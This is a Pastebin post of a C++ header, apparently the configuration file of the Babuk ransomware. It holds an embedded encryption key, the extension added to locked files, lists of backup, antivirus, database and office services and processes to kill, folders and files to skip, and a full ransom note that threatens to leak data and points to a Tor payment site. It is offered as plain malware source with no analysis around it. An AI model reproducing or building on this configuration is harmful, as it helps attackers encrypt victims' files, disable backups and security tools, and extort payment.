FlyFar

config.h

Mar 24th, 2024
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 5.23 KB | Cybersecurity | 0 0
  1. #ifndef __LOCKER_CONFIG__
  2. #define __LOCKER_CONFIG__
  3.  
  4. unsigned char MY_ECDH_PUB_KEY[144] = {
  5.     0x36, 0x40, 0x45, 0x38, 0xF5, 0x41, 0x90, 0x95, 0x56, 0xB0, 0xC0, 0xAF,
  6.     0x34, 0x8B, 0xBA, 0x53, 0x2E, 0x91, 0x21, 0x8F, 0xA6, 0xD7, 0x96, 0x6C,
  7.     0x0D, 0xC0, 0xB3, 0x13, 0xBF, 0x0C, 0xAE, 0x44, 0x15, 0x63, 0x96, 0x1B,
  8.     0xC0, 0xDF, 0x8D, 0x20, 0x64, 0x1F, 0xD5, 0xF6, 0x1B, 0xF7, 0x15, 0x1B,
  9.     0xDC, 0x9D, 0x8F, 0xBB, 0x63, 0xF9, 0x46, 0x0E, 0x1F, 0x47, 0x4F, 0x19,
  10.     0xE6, 0xE8, 0xBE, 0xFE, 0x98, 0x4D, 0xE1, 0x42, 0x64, 0x39, 0x0E, 0x07,
  11.     0x3D, 0x4A, 0x50, 0x56, 0x7B, 0xD0, 0xEF, 0xF9, 0xBE, 0x37, 0xBD, 0xC5,
  12.     0x51, 0x86, 0xD8, 0xE0, 0xDB, 0x82, 0x05, 0xEF, 0xA4, 0x97, 0xE4, 0x74,
  13.     0x8F, 0xEB, 0xAF, 0x5F, 0x57, 0xBE, 0xD9, 0x40, 0x77, 0x11, 0xB7, 0x4B,
  14.     0xF9, 0xC2, 0x60, 0x00, 0x90, 0xFF, 0x82, 0xE1, 0x65, 0x6E, 0xF2, 0x06,
  15.     0x04, 0xB8, 0xA9, 0xDC, 0xD7, 0x1A, 0x74, 0x45, 0x8B, 0x86, 0xD0, 0xE1,
  16.     0x01, 0x20, 0x5F, 0xD9, 0x71, 0xD4, 0x96, 0xC7, 0xC0, 0xFA, 0x6B, 0x05
  17. };
  18.  
  19.  
  20. // The file extension appened to files
  21. const WCHAR RANSOM_EXT[] = L".__NIST_K571__";
  22.  
  23. // Services that are killed
  24. const CHAR  *BLACKLISTED_SERVICES[]  =
  25. {
  26.     "vss",
  27.     "sql",
  28.     "svc$",
  29.     "memtas",
  30.     "mepocs",
  31.     "sophos",
  32.     "veeam",
  33.     "backup",
  34.     "GxVss",
  35.     "GxBlr",
  36.     "GxFWD",
  37.     "GxCVD",
  38.     "GxCIMgr",
  39.     "DefWatch",
  40.     "ccEvtMgr",
  41.     "ccSetMgr",
  42.     "SavRoam",
  43.     "RTVscan",
  44.     "QBFCService",
  45.     "QBIDPService",
  46.     "Intuit.QuickBooks.FCS",
  47.     "QBCFMonitorService",
  48.     "YooBackup",
  49.     "YooIT",
  50.     "zhudongfangyu",
  51.     "sophos",
  52.     "stc_raw_agent",
  53.     "VSNAPVSS",
  54.     "VeeamTransportSvc",
  55.     "VeeamDeploymentService",
  56.     "VeeamNFSSvc",
  57.     "veeam",
  58.     "PDVFSService",
  59.     "BackupExecVSSProvider",
  60.     "BackupExecAgentAccelerator",
  61.     "BackupExecAgentBrowser",
  62.     "BackupExecDiveciMediaService",
  63.     "BackupExecJobEngine",
  64.     "BackupExecManagementService",
  65.     "BackupExecRPCService",
  66.     "AcrSch2Svc",
  67.     "AcronisAgent",
  68.     "CASAD2DWebSvc",
  69.     "CAARCUpdateSvc"
  70. };
  71.  
  72. // Processes that are killed
  73. const WCHAR *BLACKLISTED_PROCESSES[] =
  74. {
  75.     L"sql.exe",
  76.     L"oracle.exe",
  77.     L"ocssd.exe",
  78.     L"dbsnmp.exe",
  79.     L"synctime.exe",
  80.     L"agntsvc.exe",
  81.     L"isqlplussvc.exe",
  82.     L"xfssvccon.exe",
  83.     L"mydesktopservice.exe",
  84.     L"ocautoupds.exe",
  85.     L"encsvc.exe",
  86.     L"firefox.exe",
  87.     L"tbirdconfig.exe",
  88.     L"mydesktopqos.exe",
  89.     L"ocomm.exe",
  90.     L"dbeng50.exe",
  91.     L"sqbcoreservice.exe",
  92.     L"excel.exe",
  93.     L"infopath.exe",
  94.     L"msaccess.exe",
  95.     L"mspub.exe",
  96.     L"onenote.exe",
  97.     L"outlook.exe",
  98.     L"powerpnt.exe",
  99.     L"steam.exe",
  100.     L"thebat.exe",
  101.     L"thunderbird.exe",
  102.     L"visio.exe",
  103.     L"winword.exe",
  104.     L"wordpad.exe",
  105.     L"notepad.exe"
  106. };
  107.  
  108. // Files that are skipped
  109. const WCHAR *BLACKLISTED_FILENAMES[] =
  110. {
  111.     // Folder names
  112.     L"Windows",
  113.     L"Windows.old",
  114.     L"Tor Browser",
  115.     L"Internet Explorer",
  116.     L"Google",
  117.     L"Opera",
  118.     L"Opera Software",
  119.     L"Mozilla",
  120.     L"Mozilla Firefox",
  121.     L"$Recycle.Bin",
  122.     L"ProgramData",
  123.     L"All Users",
  124.    
  125.     // File names
  126.     L"autorun.inf",
  127.     L"boot.ini",
  128.     L"bootfont.bin",
  129.     L"bootsect.bak",
  130.     L"bootmgr",
  131.     L"bootmgr.efi",
  132.     L"bootmgfw.efi",
  133.     L"desktop.ini",
  134.     L"iconcache.db",
  135.     L"ntldr",
  136.     L"ntuser.dat",
  137.     L"ntuser.dat.log",
  138.     L"ntuser.ini",
  139.     L"thumbs.db",
  140.     L"ecdh_pub_k.bin",
  141.     L"Program Files",
  142.     L"Program Files (x86)",
  143.     L"..",
  144.     L"."
  145. };
  146.  
  147. // The name of the ransom note
  148. const WCHAR RANSOM_NAME[]  = L"How To Restore Your Files.txt";
  149.  
  150. // The ransom note text
  151. const CHAR  RANSOM_NOTE[]  =  "----------- [ Hello! ] ------------->\r\n"
  152.                               "\r\n"
  153.                               "       ****BY BABUK LOCKER****\r\n"
  154.                               "\r\n"
  155.                               "What happend?\r\n"
  156.                               "----------------------------------------------\r\n"
  157.                               "Your computers and servers are encrypted, backups are deleted from your network and copied. We use strong encr"
  158.                               "yption algorithms, so you cannot decrypt your data.\r\n"
  159.                               "But you can restore everything by purchasing a special program from us - a universal decoder. This program wil"
  160.                               "l restore your entire network.\r\n"
  161.                               "Follow our instructions below and you will recover all your data.\r\n"
  162.                               "If you continue to ignore this for a long time, we will start reporting the hack to mainstream media and posti"
  163.                               "ng your data to the dark web.\r\n"
  164.                               "\r\n"
  165.                               "What guarantees?\r\n"
  166.                               "----------------------------------------------\r\n"
  167.                               "We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our inte"
  168.                               "rests.\r\n"
  169.                               "All our decryption software is perfectly tested and will decrypt your data. We will also provide support in ca"
  170.                               "se of problems.\r\n"
  171.                               "We guarantee to decrypt one file for free. Go to the site and contact us.\r\n"
  172.                               "\r\n"
  173.                               "How to contact us? \r\n"
  174.                               "----------------------------------------------\r\n"
  175.                               "Using TOR Browser ( https://www.torproject.org/download/ ):\r\n"
  176.                               "http://babukq4e2p4wu4iq.onion/login.php?id=8M60J4vCbbkKgM6QnA07E9qpkn0Qk7\r\n"
  177.                               "\r\n"
  178.                               "!!! DANGER !!!\r\n"
  179.                               "DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n"
  180.                               "!!! DANGER !!";
  181.  
  182.  
  183. #endif
Add Comment
Please, Sign In to add comment